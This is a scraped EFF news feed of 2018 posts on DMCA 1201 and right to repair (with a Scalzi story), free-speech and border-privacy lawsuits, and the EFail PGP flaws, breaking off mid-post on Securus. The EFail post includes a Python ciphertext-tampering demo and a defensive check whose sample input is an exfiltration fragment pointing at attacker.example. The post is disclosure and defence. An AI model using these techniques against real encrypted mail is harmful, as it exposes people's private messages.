Section 1201 of the Digital Millennium Copyright Act (DMCA 1201) makes it illegal to get around any sort of lock that controls access to copyrighted material. Getting exemptions to that prohibition is a long, complicated process that often results in long, complicated exemptions that are difficult to use. As part of our ongoing effort to fight this law, we're presenting a series of science fiction stories to illustrate the bad effects DMCA 1201 could have. It's been 20 years since Congress adopted Section 1201 of the DMCA, one of the ugliest mistakes in the crowded field of bad ideas about computer regulation. Thanks to Section 1201, if a computer has a lock to control access to a copyrighted work, then getting around that lock, for any reason, is illegal. In practice, this has meant that a manufacturer can make the legitimate, customary things you do with your own property, in your own home or workplace, illegal just by designing the products to include those digital locks. A small bit of good news: Congress designed a largely ornamental escape valve into this system. Every three years, the Librarian of Congress can grant exemptions to the law for certain activities. These exemptions make those uses temporarily legal, but (here's the hilarious part) it's still not legal to make a tool to enable that use. It's as though Congress expected you to gnaw open your devices and manually change the software with the sensitive tips of your nimble fingers or something. That said, in many cases it's easy to download the tools you need anyway. We're suing the U.S. government to invalidate DMCA 1201, which would eliminate the whole farce. It's 2018, and that means it's exemptions time again! EFF and many of our allies have filed for a raft of exemptions to DMCA 1201 this year, and in this series, we're teaming up with some amazing science fiction writers to explain what's at stake in these requests. This week, we're discussing our right to repair exemption. Did you know the innards of your car are copyrighted? That's what the big auto manufacturers say, anyway. Since the dawn of the automotive industry, car owners could fix their cars themselves, or bring them to a mechanic of their choosing, from official, authorized mechanics to "shade-tree mechanics" who kept their motors going. But the auto industry says that once they added copyrighted software to their products, they could use copyright law to control who could fix them. All they have to do is design the engines so that the diagnostic information necessary to fix a car is scrambled, and then they get to invoke Section 1201 of the DMCA against anyone who descrambles that information without permission. They can even use this gimmick to design an engine that only accepts parts made by the original manufacturer—simply add a bit of software to do some cryptographic checking on the part's chips, and use DMCA 1201 threats to shut down anyone who makes a chip that can send the right codes to let you use someone else's part. The use of DRM to threaten the independent repair sector is a bad deal all around. Repair is an onshore industry that creates middle-class jobs in local communities, where service technicians help Americans get more value out of the devices they buy. It's not just cars: everything from tractors to printers, from toys to thermostats has been designed with DRM that stands in the way of your ability to decide who fixes your stuff, or whether it can be fixed at all. 
That's why we've asked the Copyright Office to create a broad exemption to permit repair technicians to bypass any DRM that gets in the way of their ability to fix your stuff for you. Our friend John Scalzi was kind enough to write us a science fiction story that illustrates the stakes involved. Right to Repair, by John Scalzi “Winston Jones?” “That’s me.” “Hi, I’m Breanna, the mechanic that’s been looking at your car since it got towed in. Bad luck, that.” “Tell me about it. One minute I’m in the fast lane, the next I have to swerve all the way across the freeway to get to the shoulder before I get rammed by a semi.” “Well, glad you made out of there alive. It made it easier for our tow driver to get to you. So, Mr. Jones, I have some good news, and some less good news.” “What’s the good news?” “The good news is that the only thing wrong with your car is a snapped timing chain.” “That’s it?” “That’s it. And that’s lucky too. A snapped chain can do a lot of damage. But the rest of your engine looks clean.” “Well, hell. That’s the first piece of good news I’ve had all day. You have timing chains here?” “Yes, we do. But... well, Mr. Jones, that’s the less good news.” “What is it?” “We don’t have your specific car’s timing belt here.” “Is there something unusual about it?” “Not really. Your car manufacturer standardized them across most its models. In fact, it’s pretty much exactly that one up on the wall over there.” “Well, just use that one, then.” “I’d love to, but I can’t. You have the sport model of your car, and so your manufacturer requires you to use the sport timing chain.” “What’s the difference?” “No difference, except they call it the ‘sport model.’ And they charge $60 more for it.” “So if it’s the same then you should just be able to use the one up there.” “I’d love to. But the chains have a small RFID transmitter in them.” “So?” “So if I put the wrong timing chain in, the car will know.” “And then what?” “Then it won’t start. Your information screen will tell you that you need a different part. And then it will just sit there.” “The car won’t work at all?” “Well, you can run the radio. But it won’t move.” “You’re telling me that you can’t use that timing chain, even though it’s exactly the same as the one the car needs.” “Pretty much.” “Because I have the sport model.” “Yup.” “Can’t you just lose the RFID chip?” “Then it definitely won’t work. No chip, no ignition.” “That can’t be legal.” “It’s covered in the car’s EULA. You clicked through it the first time you used the radio.” “But it’s just a code in the chip, right? Can’t you download a working code from the internet and put it in any chip?” “Technically? Yes. Easy as pie. Legally? No. They could pop me for $500,000 and five years in prison.” “You’re joking.” “Sir, I am most definitely not joking.” “Fine. Can you get the sport timing chain?” “Yes.” “Good.” “In three weeks.” “What?!?” “Back order. I mean, probably three weeks? We’re in a trade war. The timing chains are made in Asia. They’re in a cargo ship in Hong Kong, waiting clearance to come over.” “So I can’t drive my car for three weeks because of a stupid timing chain.” “We could tow the car to a dealer. They might have a sport chain. The closest dealer that can service this particular model is three counties away. But I’d call first to make sure they have it. Otherwise we’ll have towed you all that way for nothing, and you’ll still have to pay us.” “I kind of need this car to work today.” “I know, Mr. Jones. 
And when we get the part, it’ll be literally a twenty-minute fix.” “Twenty minutes and three weeks, you mean.” “Probably three weeks. Maybe longer.” “I need a drink.” “We do have coffee, Mr. Jones.” “Well, that’s something.” “It’s decaf.”  
>> mehr lesen

EFF Sues Texas A&M University For Violating PETA's Free Speech Rights By Blocking Group From Its Facebook Page (Mo, 14 Mai 2018)
Posts Criticizing Medical Research on Dogs Blocked, Deleted Houston, Texas—The Electronic Frontier Foundation (EFF) sued Texas A&M University on behalf of People for the Ethical Treatment of Animals (PETA) for blocking comments on its official Facebook page that mention PETA by name or use certain words to criticize the university’s use of dogs in muscular dystrophy experiments. The school, the nation’s second-largest public university by student enrollment, won’t publish any post containing the animal rights group’s name, or posts containing any of at least 11 words, including “cruelty,” “abuse,” “torture,” “lab,” “testing,” and “shut.” The censorship started after PETA began an advocacy campaign against Texas A&M for a medical research lab studying muscular dystrophy in dogs for the purposes of finding a cure for the human version of the disease. The lab breeds golden retrievers to develop the illness, and subjects the dogs to cruel and inhuman treatment, PETA maintains. The organization uses social media, including Facebook, to publicize its campaign. The Facebook page of Texas A&M contains information about its educational, medical research, and sports programs, as well as its students and community members. Anyone on Facebook who visits the site is invited to “write something on this page,” comment on posts, and reply to posts by the university or visitors to the page. Posts and comments aren’t confined to university affairs—topics range from animal welfare and the environment to sexual awareness and the weather. In a complaint filed today in U.S. District Court for the Southern District of Texas, PETA maintains that the Texas A&M Facebook page is a government-controlled forum for speech that, under the First Amendment, can’t exclude speech based on the speaker’s expressed viewpoint. That the term “PETA”—and words frequently used in the group’s anti-cruelty campaign against the school’s dog lab—are blocked demonstrates the university’s intent to silence PETA and others opposed to animal testing from expressing their views in the Facebook forum. “Speaker-based and viewpoint-based discrimination of speech in a designated public forum like the university’s Facebook page is rarely permitted under the First Amendment,” said EFF Civil Liberties Director David Greene. “We are asking a judge to declare that Texas A&M’s restrictions against PETA on its Facebook page are unconstitutional and require the university to repost PETA’s content on the site and stop blocking PETA from posting and commenting on the site.” EFF has taken a stand for the First Amendment rights of individuals and groups to receive and comment on social media posts used by government to conduct the work of government. When federal, state, and local agencies and elected officials—even the president—use social media platforms like Facebook and Twitter to communicate directly with the public about programs, policies, and opinions, the First Amendment sharply restricts the government’s ability to prevent us from receiving and commenting on those communications. “Our First Amendment rights are infringed when agencies and officials block the posts they don’t like or agree with,” said Greene. 
“And the rights of all readers are affected when the government manipulates its social media pages to make it appear that its policies and practices are embraced, rather than condemned.” For the complaint: https://www.eff.org/document/peta-v-texas-am For more on First Amendment rights and social media: https://www.eff.org/deeplinks/2017/11/when-officials-tweet-about-government-business-they-dont-get-pick-and-choose-who Contact:  Adam Schwartz Senior Staff Attorney adam@eff.org Camille Fischer Frank Stanton Fellow cfischer@eff.org
>> mehr lesen

Keep Old Recordings From Getting a New and Confusing Copyright Law (Mo, 14 Mai 2018)
The newest version of the Music Modernization Act, S. 2823, added provisions from the bill known as CLASSICS, turning a largely great bill into a bad one. We have to tell the Senate to reject this version of the bill. S. 2823 was introduced by Sen. Orrin Hatch on May 10. It follows the bad precedent set by the House of Representatives by combining the largely good Music Modernization Act with the bad CLASSICS Act. An act which would establish a new system for compensating songwriters and music publishers when their songs are played on digital services has now been polluted by an act which creates a new pseudo-copyright that presents new barriers for fans of old music. S. 2823 extends parts of federal copyright to cover sound recordings made before 1972, which are currently covered by an assortment of state laws. Under this new law, for the first time, recordings made between 1923 and 1972 couldn’t be streamed on digital music services or Internet radio without a license, and failing to get one could leave the streamer liable for massive, unpredictable statutory damages. This makes it harder to archive older music and harder for fans of older music to stream it. It also doesn’t create any new incentives for artists to create new work. All of this music is old enough to have already made plenty of money for the rightsholders, which are usually recording companies and not the artists in the first place. The Senate should not pass music copyright reform with this new pseudo-copyright in it. Tell the Senate to reject S. 2823. Take Action: Stop S. 2823
>> mehr lesen

Victory in Alasaad for Our Digital Privacy at the Border (Mo, 14 Mai 2018)
Government searches of cell phones, laptops, and other electronic devices without a warrant when we cross the U.S. border may violate the First and Fourth Amendments, according to a powerful ruling by a federal court last week in a civil rights lawsuit brought by EFF and the ACLU. It is the latest and greatest of a growing wave of judicial opinions challenging the government’s claim that it can ransack and confiscate our electronic devices—just because we travel internationally. By allowing the EFF and ACLU case to proceed, the district court signaled that the government’s invasion of people’s digital privacy and free speech rights at the border raises significant constitutional concerns. This post analyzes the decision and explains what’s next for the case. Our Lawsuit In Alasaad v. Nielsen, we sued on behalf of 11 travelers, arguing that the First and Fourth Amendments require border officers to get a warrant before searching our electronic devices. We also argue that the Fourth Amendment requires border officers to have probable cause before confiscating our electronic devices for weeks or months. We seek an “injunction” against the U.S. Department of Homeland Security, U.S. Customs and Border Protection, and U.S. Immigration and Customs Enforcement, meaning a command from a judge to end these practices. The government moved to dismiss on two grounds. First, they claimed our clients lacked “standing” to seek an injunction, because supposedly our clients could not prove a sufficient risk of being searched again. Second, on the merits, the government claimed that the First and Fourth Amendments do not require border officers to have any suspicion at all before searching and confiscating travelers’ electronic devices. We filed an opposition brief refuting the government’s arguments. We were buoyed by three strong amicus briefs (a.k.a. friend-of-the-court briefs). The court held an oral argument to explore the issues. The district court rejected the government’s arguments, denied their motion to dismiss, and allowed us to proceed with our case. In her opinion, the judge made a host of critical rulings about how the Constitution protects digital privacy and free speech at the border. Fourth Amendment Limits on Device Searches at the Border The Alasaad court’s analysis rested significantly on the Supreme Court’s holding in Riley v. California (2014) that the Fourth Amendment requires police officers to get a warrant before searching the cell phones of arrestees. In Riley, the Court balanced the privacy interests in cell phones against the government’s interests in conducting warrantless searches incident to arrest—specifically, officer safety and evidence preservation. On the privacy side of the balance, the Alasaad court explained that “electronic devices implicate privacy interests in a fundamentally different manner than searches of typical containers or even searches of a person.” The court also extensively quoted the Supreme Court’s Riley decision, including how with digital devices, “The sum of an individual’s private life can be reconstructed through a thousand photographs labeled with dates, locations, and descriptions” dating back to the purchase of the phone. 
In the opinion, the court stated that “a person’s internet browsing history, historic location information, and mobile application software (or ‘apps’) ‘can form a revealing montage of the user’s life.’” Indeed, the Court stated that “a cell phone search would typically expose to the government far more than the most exhaustive search of a house.” To illustrate the way that cell phone searches burden privacy, the Alasaad court highlighted that two of the plaintiffs are Muslim women with religious concerns about men viewing their hair: “Nadia Alasaad and Merchant object [to male border officers searching their phones] due to their photos on their phones of themselves without headscarves.” Additionally, some cases as well as CBP’s 2018 policy provide more privacy protection from “forensic” searches (when border officers deploy their own digital tools to analyze travelers’ devices), and less privacy protection from “manual” searches (when border officers simply tap or mouse around the device). Plaintiffs reject this dichotomy, because manual searches can access virtually all of the information that forensic searches can access, and manual searches can take advantage of the automatic search tools built into travelers’ own devices. Significantly, the Alasaad court acknowledged that manual searches can be intrusive, too. On the government’s side of the scale, the Alasaad court relied on Riley to explain that warrantless searches of a “particular category of effects” such as cell phones must be sufficiently “tethered” to the government’s interests. At the border, the government’s interests in conducting warrantless searches are to collect duties and to prevent the entry of contraband and other harmful items. The question, then, is whether warrantless searches of electronic devices sufficiently advance these interests. The Alasaad court agreed with plaintiffs that there is an important difference between border officers conducting warrantless searches for “contraband” (where tethering is stronger) and conducting warrantless searches for “evidence” of contraband or other unlawful activity (where tethering is weaker). To the degree that border officers are seeking digital contraband, the Alasaad court held that “it is unclear at this juncture the extent to which a warrant requirement would impede customs officers’ ability to ferret out such contraband.” The court explained, quoting Riley, that “recent technological advances make the process of obtaining a warrant more efficient.” Moreover, the court was not persuaded by the government’s claim that child pornography is a form of digital contraband that justifies warrantless searches of electronic devices. The court explained that Riley requires the government to show that the problem it wants to solve with warrantless searches is “prevalent.” The Alasaad court cited government data showing that “the vast majority” of child pornography is accessed on the Internet, and thus found it “unclear” whether there is a prevalent problem with travelers carrying such contraband over the border. Assuming that privacy interests outweigh government interests, the next question is what level of individualized suspicion a border officer must have before searching an electronic device. 
While the government asserts that the ceiling is “reasonable suspicion” (a lower level of protection), plaintiffs demand a warrant (the highest level of protection). The Alasaad court left this question open, but the judge suggested that a warrant might be preferable because the reasonable suspicion standard applied to border searches of electronic devices might provide “no practical limit at all.” First Amendment Limits on Device Searches at the Border The Alasaad court emphasized plaintiffs’ argument that when border officers search travelers’ electronic devices, they burden travelers’ First Amendment rights to free speech and association. Specifically, they expose membership in private advocacy organizations, unmask anonymous speech, and intrude on freedom of the press. Given these burdens, the court held that border device searches are subject to a strong First Amendment test: government must prove a “substantial relation between the governmental interest and the information required to be disclosed.” The court rejected an earlier judicial opinion suggesting that First Amendment scrutiny of border device searches would cause “headaches” for border officers. Quoting Riley, the Alasaad court explained that plaintiffs are not seeking a special or complicated rule; as with the Fourth Amendment claim, “what plaintiffs seek as a remedy here is ‘simple—get a warrant.’” The court in its opinion also cited examples from plaintiffs’ complaint to illustrate how border device searches burden travelers’ First Amendment rights: “While Dupin’s phone was being searched, he was questioned ‘about his work as a journalist, including the names of the organizations and specific individuals within those organizations for whom he had worked’; Gach was questioned ‘about his work as an artist’ prior to searching his phone; Kushkush was asked about ‘his reporting activities’; and Merchant was questioned at secondary inspection about her ‘religious affiliation’ and her blog.” Fourth Amendment Limits on Device Confiscations at the Border The Alasaad court held that plaintiffs plausibly alleged that border officers’ lengthy confiscations, without probable cause, of plaintiffs’ devices violated the Fourth Amendment. The court explained that seizures must be reasonable “not only at their inception but also for their duration.” The court emphasized plaintiffs’ allegations of a 10-month confiscation of Mr. Allababidi’s device, and a 56-day confiscation of Mr. Wright’s devices. Plaintiffs Have Standing The Alasaad court on two grounds held that plaintiffs sufficiently alleged standing to seek an injunction against the government for these First and Fourth Amendment violations. First, the court held that plaintiffs pled a substantial risk of future border searches and confiscations of their electronic devices. The court emphasized plaintiffs’ allegations that all plaintiffs will continue to travel across the U.S. border with their devices; that when they do so, they will be exposed to the government’s device search policies; and that plaintiffs can only avoid this risk by foregoing their right to travel or by traveling without their devices, which is impractical. The court rejected the government’s argument that the odds of future search are too low (the government asserts that they search the devices of 0.008% of travelers crossing the border). 
The court reasoned that “even a small probability of injury is sufficient”; that the absolute number of searches is large (over 30,000 per year); and that plaintiffs may be more likely than other travelers to suffer future searches, given that four plaintiffs have already been searched on multiple occasions, and that officers are alerted to past searches. Second, the court held that plaintiffs had standing to seek expungement of the information that the government seized from plaintiffs’ devices, to cure this ongoing harm resulting from the past unconstitutional searches of plaintiffs’ devices. The court emphasized plaintiffs’ allegation that government agencies “remain free to use and exploit [this seized information] and share it with other agencies that may do the same.” Next Steps EFF will continue to fight for digital privacy at the border, in Alasaad and other cases. The district court’s powerful new ruling puts a lot of wind in our sails. If you want to strengthen the privacy of your own digital information when you cross the border, check out our guide on how to do so. If you want to take direct action, contact your federal legislators and ask them to support a pending bill to require border officers to get a warrant before searching digital devices. The border is not a Constitution-free zone. Related Cases:  Alasaad v. Nielsen
>> mehr lesen

Not So Pretty: What You Need to Know About E-Fail and the PGP Flaw (Mo, 14 Mai 2018)
Don’t panic! But you should stop using PGP for encrypted email and switch to a different secure communications method for now. A group of researchers released a paper today that describes a new class of serious vulnerabilities in PGP (including GPG), the most popular email encryption standard. The new paper includes a proof-of-concept exploit that can allow an attacker to use the victim’s own email client to decrypt previously acquired messages and return the decrypted content to the attacker without alerting the victim. The proof of concept is only one implementation of this new type of attack, and variants may follow in the coming days. Because of the straightforward nature of the proof of concept, the severity of these security vulnerabilities, the range of email clients and plugins affected, and the high level of protection that PGP users need and expect, EFF is advising PGP users to pause in their use of the tool and seek other modes of secure end-to-end communication for now. Because we are awaiting the security community’s response to the flaws highlighted in the paper, we recommend that for now you uninstall or disable your PGP email plug-in. These steps are intended as a temporary, conservative stopgap until the immediate risk of the exploit has passed and been mitigated by the wider community. There may be simpler mitigations available soon, as vendors and commentators develop narrower solutions, but this is the safest stance to take for now, because sending PGP-encrypted emails to an unpatched client will create adverse ecosystem incentives to open incoming emails, any of which could be maliciously crafted to expose ciphertext to attackers. While you may not be directly affected, the other participants in your encrypted conversations are likely to be. For this attack, it isn’t important whether the sender or the receiver of the original secret message is targeted. This is because a PGP message is encrypted to both of their keys. At EFF, we have relied on PGP extensively both internally and to secure much of our external-facing email communications. Because of the severity of the vulnerabilities disclosed today, we are temporarily dialing down our use of PGP for both internal and external email. Our recommendations may change as new information becomes available, and we will update this post when that happens. How The Vulnerabilities Work PGP, which stands for “Pretty Good Privacy,” was first released nearly 27 years ago by Phil Zimmermann. Extraordinarily innovative for the time, PGP transformed the level of privacy protection available for digital communications, and has provided tech-savvy users with the ability to encrypt files and send secure email to people they’ve never met. Its strong security has protected the messages of journalists, whistleblowers, dissidents, and human rights defenders for decades. While PGP is now a privately owned tool, an open source implementation called GNU Privacy Guard (GPG) has been widely adopted by the security community in a number of contexts, and is described in the OpenPGP Internet standards document. The paper describes a series of vulnerabilities that all have in common their ability to expose email contents to an attacker when the target opens a maliciously crafted email sent to them by the attacker. In these attacks, the attacker has obtained a copy of an encrypted message, but was unable to decrypt it. 
The first attack is a “direct exfiltration” attack that is caused by the details of how mail clients choose to display HTML to the user. The attacker crafts a message that includes the old encrypted message. The new message is constructed in such a way that the mail software displays the entire decrypted message—including the captured ciphertext—as unencrypted text. Then the email client’s HTML parser immediately sends or “exfiltrates” the decrypted message to a server that the attacker controls. The second attack abuses the underspecification of certain details in the OpenPGP standard to exfiltrate email contents to the attacker by modifying a previously captured ciphertext. Here are some technical details of the vulnerability, in plain-as-possible language: When you encrypt a message to someone else, it scrambles the information into “ciphertext” such that only the recipient can transform it back into readable “plaintext.” But with some encryption algorithms, an attacker can modify the ciphertext, and the rest of the message will still decrypt back into the correct plaintext. This property is called malleability. This means that they can change the message that you read, even if they can’t read it themselves. To address the problem of malleability, modern encryption algorithms add mechanisms to ensure integrity, or the property that assures the recipient that the message hasn’t been tampered with. But the OpenPGP standard says that it’s ok to send a message that doesn’t come with an integrity check. And worse, even if the message does come with an integrity check, there are known ways to strip off that check. Plus, the standard doesn’t say what to do when the check fails, so some email clients just tell you that the check failed, but show you the message anyway. The second vulnerability takes advantage of the combination of OpenPGP’s lack of mandatory integrity verification combined with the HTML parsers built into mail software. Without integrity verification in the client, the attacker can modify captured ciphertexts in such a way that as soon as the mail software displays the modified message in decrypted form, the email client’s HTML parser immediately sends or “exfiltrates” the decrypted message to a server that the attacker controls. For proper security, the software should never display the plaintext form of a ciphertext if the integrity check does not check out. Since the OpenPGP standard did not specify what to do if the integrity check does not check out, some software incorrectly displays the message anyway, enabling this attack. This means that not only can attackers get access to the contents of your encrypted messages the second you open an email, but they can also use these techniques to get access to the contents of any encrypted message that you have ever sent, as long as they have a copy of the ciphertext. What's Being Done to Fix this Vulnerability It’s possible to fix the specific exploits that allow messages to be exfiltrated: namely, do better than the standard says by not rendering messages if their integrity checks don’t check out. Updating the protocol and patching vulnerable software applications would address this specific issue. Fixing this entirely is going to take time. Some software patches have already begun rolling out, but it will be some time before every user of every affected software is up-to-date, and even longer before the standards are updated. 
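To make the malleability point above concrete, here is a minimal Python sketch of how an attacker who never learns the key can still change what the recipient reads. It is illustrative only, not the researchers' exploit: it uses AES in CTR mode from the third-party cryptography package as a stand-in for OpenPGP's CFB mode, and the key, message, and account number are invented.

```python
# A toy demonstration of ciphertext malleability, the property described above.
# AES-CTR (from the third-party `cryptography` package) stands in for OpenPGP's
# CFB mode, which is malleable in a similar way. Illustrative only; the key,
# message, and account number are made up.
import os
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

key, nonce = os.urandom(32), os.urandom(16)

def aes_ctr(data: bytes) -> bytes:
    # CTR is a stream mode: the same operation encrypts and decrypts.
    ctx = Cipher(algorithms.AES(key), modes.CTR(nonce)).encryptor()
    return ctx.update(data) + ctx.finalize()

plaintext = b"Send the payment to account 1111"
ciphertext = aes_ctr(plaintext)

# The attacker never learns `key`, but guesses part of the plaintext. XORing a
# ciphertext byte with (old_byte ^ new_byte) flips the matching plaintext byte.
tampered = bytearray(ciphertext)
for i, (old, new) in enumerate(zip(b"1111", b"9999"), start=len(plaintext) - 4):
    tampered[i] ^= old ^ new

print(aes_ctr(bytes(tampered)))  # b'Send the payment to account 9999'
```

OpenPGP's integrity check (the MDC) exists precisely to detect this kind of tampering, which is why clients that ignore a failed or missing check are exposed.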
Right now, information security researchers and the coders of OpenPGP-based systems are poring over the research paper to determine the scope of the flaw. We are in an uncertain state, where it is hard to promise the level of protection users can expect of PGP without giving a fast-changing and increasingly complex set of instructions and warnings. PGP usage was always complicated and error-prone; with this new vulnerability, it is currently almost impossible to give simple, reliable instructions on how to use it with modern email clients. It is also hard to tell people to move off using PGP in email permanently. There is no other email encryption tool that has the adoption levels, multiple implementations, and open standards support that would allow us to recommend it as a complete replacement for PGP. (S/MIME, the leading alternative, suffers from the same problems and is more vulnerable to the attacks described in the paper.) There are, however, other end-to-end secure messaging tools that provide similar levels of security: for instance, Signal. If you need to communicate securely during this period of uncertainty, we recommend you consider these alternatives. We Need To Be Better Than Pretty Good The flaw that the researchers exploited in PGP was known for many years as a theoretical weakness in the standard—one of many initially minor problems with PGP that have grown in significance over its long life. You can expect a heated debate over the future of PGP, strong encryption, and even the long-term viability of email. Many will use today’s revelations as an opportunity to highlight PGP’s numerous issues with usability and complexity, and demand better. They’re not wrong: our digital world needs a well-supported, independent, rock-solid public key encryption tool now more than ever. Meanwhile, the same targeted populations who really need strong privacy protection will be waiting for the steps they can take to use email securely once again. We’re taking this latest announcement as a wake-up call to everyone in the infosec and digital rights communities: not to pile on recriminations or criticisms of PGP and its dedicated, tireless, and largely unfunded developers and supporters, but to unite and work together to re-forge what it means to be the best privacy tool for the 21st century. While EFF is dialing down our use of PGP for the time being (and recommends you do so too), we’re going to double down on supporting independent, strong encryption—whether that comes from a renewed PGP, or from integrating and adapting the new generation of strong encryption tools for general purpose use. We’re also going to keep up our work improving the general security of the email ecosystem with initiatives like STARTTLS Everywhere. PGP in its current form has served us well, but “pretty good privacy” is no longer enough. We all need to work on really good privacy, right now. EFF’s recommendations: Disable or uninstall PGP email plugins for now. Do not decrypt encrypted PGP messages that you receive. Instead, use non-email based messaging platforms, like Signal, for your encrypted messaging needs. Use offline tools to decrypt PGP messages you have received in the past. Check for updates at our Surveillance Self-Defense site regarding client updates and improved secure messaging systems. 
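For developers wondering what "do better than the standard says" looks like in practice, here is a rough sketch of the fail-closed behavior described above. The DecryptResult structure and function names are hypothetical, not part of any real mail client or OpenPGP library.

```python
# A sketch (not real library code) of the defensive behavior described above:
# refuse to hand decrypted content to the HTML renderer unless the integrity
# (MDC) check passed. `DecryptResult` and both functions are hypothetical names.
from dataclasses import dataclass

@dataclass
class DecryptResult:
    plaintext: bytes
    integrity_check_passed: bool  # e.g. OpenPGP's MDC verified

def render_decrypted(result: DecryptResult) -> str:
    if not result.integrity_check_passed:
        # Displaying the plaintext anyway is exactly what the exfiltration
        # attacks rely on, so fail closed instead.
        raise ValueError("integrity check failed; refusing to render message")
    return result.plaintext.decode("utf-8", errors="replace")

# Example: a tampered message should be rejected, not shown.
tampered = DecryptResult(b"<img src='http://attacker.example/", False)
try:
    render_decrypted(tampered)
except ValueError as err:
    print(err)
```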
>> mehr lesen

Disabling PGP in Outlook with Gpg4win (Mo, 14 Mai 2018)
Researchers have developed code exploiting several vulnerabilities in PGP (including GPG) for email. In response, EFF’s current recommendation is to disable PGP integration in email clients. Disabling PGP decryption in Outlook requires running the Gpg4win installer again so that you can choose not to have the GpgOL plug-in on your system. Your existing keys will remain available on your machine. 1. Download and open the Gpg4win installer. 2. You’ll then see the Gpg4win installer intro page. Click “Next.” 3. Uncheck “GpgOL” in the dialog, but keep all the other options the same. Click “Next.” 4. Click “Install.” It will now install to the specified location without Outlook integration. 5. Click “Finish.” Once the GpgOL plugin for Outlook is disabled, your emails will not be automatically decrypted in Outlook. Note that you will instead see the encrypted email as separate files which you can download and then read with the command line. These notes are based on Outlook 2016 and Windows 10.
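If you need to read one of those downloaded files before patches land, one conservative approach is to decrypt it entirely outside the mail client, so no HTML is ever rendered. Below is a minimal sketch that shells out to the gpg command-line tool; it assumes Gpg4win's gpg binary is on your PATH, your private key is in its keyring, and "message.asc" is a placeholder for the file you saved.

```python
# A minimal sketch of decrypting a downloaded message outside the mail client,
# assuming the `gpg` command-line tool (installed with Gpg4win) is on your PATH
# and your private key is in its keyring. "message.asc" is a placeholder name
# for the encrypted file you saved from Outlook.
import subprocess

def decrypt_offline(path: str) -> str:
    # gpg --decrypt writes the plaintext to stdout; if the key has a passphrase,
    # gpg will prompt for it through its own pinentry dialog.
    result = subprocess.run(
        ["gpg", "--decrypt", path],
        capture_output=True, text=True, check=True,
    )
    return result.stdout

if __name__ == "__main__":
    print(decrypt_offline("message.asc"))
```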
>> mehr lesen

Disabling PGP in Apple Mail with GPGTools (Mo, 14 Mai 2018)
Researchers have developed code exploiting several vulnerabilities in PGP (including GPG) for email. In response, EFF’s current recommendation is to disable PGP integration in email clients. Disabling PGP decryption in Apple Mail requires deleting a “bundle” file used by the application. Your existing keys will remain available on your machine. 1. First, click the Mail icon in the dock. 2. Click “Mail” in the menu bar on the top of the screen, and select “Quit Mail.” This is to make sure it’s shut down completely before we continue. 3. Click the Finder icon in the Dock. 4. Click the “Go” menu in the menu bar on the top of the screen, and select “Go to Folder…” 5. This will open the “Go to Folder” window. Type this exact text: /Library/Mail/Bundles 6. At this point, you may see a folder with the “GPGMail.mailbundle” file. (If you don’t, repeat steps 4 and 5, but this time type exactly ~/Library/Mail/Bundles. You can type the ~ (tilde) character by holding shift and pressing the ` key, located directly below Esc on most keyboards.) 7. Move the file “GPGMail.mailbundle” to the trash, either by dragging it to the trash icon on the dock or by right-clicking it and selecting “Move to Trash.” 8. At this point, you may be prompted to type your macOS administrator password. Type it in, and hit the “enter” key. You may see the file deletion dialogue displayed on the screen. Once the GPGMail.mailbundle file is in your trash, your emails will not be automatically decrypted in Apple Mail. Note that you will instead see the email as a Mail Attachment file paired with the encrypted .asc file. You can download this .asc file and use it to decrypt the message on the command line.
>> mehr lesen

Disabling PGP in Thunderbird with Enigmail (Mo, 14 Mai 2018)
Researchers have developed code exploiting several vulnerabilities in PGP (including GPG) for email. In response, EFF’s current recommendation is to disable PGP integration in email clients. Disabling PGP decryption in Thunderbird only requires disabling the Enigmail add-on. Your existing keys will remain available on your machine. 1. First, click on the Thunderbird hamburger menu (the three horizontal lines). 2. Select “Add-Ons” from the right side of the menu that appears. 3. Select “Extensions” (the puzzle piece icon) on the left if it isn’t selected already. 4. Click “Disable” in the “Enigmail” row. Your Thunderbird instance will now be disconnected from PGP. Once the Enigmail plugin is disabled, your emails will not be automatically decrypted in Thunderbird. You can download this email as a file. Then, you can decrypt the message on the command line, described for each major operating system here: Windows macOS Linux
>> mehr lesen

Attention PGP Users: New Vulnerabilities Require You To Take Action Now (Mo, 14 Mai 2018)
UPDATE (5/14/18): More information has been released. See EFF's more detailed explanation and analysis here. A group of European security researchers have released a warning about a set of vulnerabilities affecting users of PGP and S/MIME. EFF has been in communication with the research team, and can confirm that these vulnerabilities pose an immediate risk to those using these tools for email communication, including the potential exposure of the contents of past messages. The full details will be published in a paper on Tuesday at 07:00 AM UTC (3:00 AM Eastern, midnight Pacific). In order to reduce the short-term risk, we and the researchers have agreed to warn the wider PGP user community in advance of its full publication. Our advice, which mirrors that of the researchers, is to immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email. Until the flaws described in the paper are more widely understood and fixed, users should arrange for the use of alternative end-to-end secure channels, such as Signal, and temporarily stop sending and especially reading PGP-encrypted email. Please refer to these guides on how to temporarily disable PGP plug-ins in: Thunderbird with Enigmail Apple Mail with GPGTools Outlook with Gpg4win   These steps are intended as a temporary, conservative stopgap until the immediate risk of the exploit has passed and been mitigated against by the wider community. We will release more detailed explanation and analysis when more information is publicly available.
>> mehr lesen

Senator Wyden Demands Answers from Prison Phone Service Caught Sharing Cellphone Location Data (Fr, 11 Mai 2018)
Do you use Verizon, AT&T, Sprint, or T-Mobile? If so, your real-time cell phone location data may have been shared with law enforcement without your knowledge or consent. How could this happen? Well, a company that provides phone services to jails and prisons has been collecting location information on all Americans and sharing it with law enforcement—with little more than a “pinky promise” from the police that they’ve obtained proper legal process. This week, Sen. Wyden called out that company, Securus Technologies, in a letter to the FCC demanding the agency investigate Securus’s practices. Wyden also sent letters to the major phone carriers asking for an accounting of all the third parties with which they share their customers’ information as well as what they think constitutes customer consent to that sharing. Wyden called on the carriers to immediately stop sharing data with any and all third parties that have misrepresented customer consent or abused their access to sensitive customer data like real-time location information. Securus Improperly Collects Data and Shares it with Law Enforcement Securus is one of the largest providers of telephone services to jails and prisons throughout the country and its technology enables inmates to make collect and prepaid calls to others outside of the facility—at outrageous, unnecessarily high prices. As part of that provision of service, Securus collects location information on everyone called by a prisoner. Securus has used its ability to collect this information to build an online portal that allows law enforcement to obtain the real-time location data of any customer of the country’s major cellphone carriers—not just people who call or receive calls from a prisoner. Worse, Securus doesn’t even check whether law enforcement requestors actually have legal authority to access the data in the first place, before sharing this private location information. Securus claims this location information is meant to identify and interdict planned importation of contraband into jails and prisons and coordinated escape attempts, and to respond to amber alerts. But that doesn’t explain why it should be getting access to the real-time location information of virtually anyone with a cellphone. Securus’s Services Appear Designed to Circumvent Federal Laws that Protect Private Customer 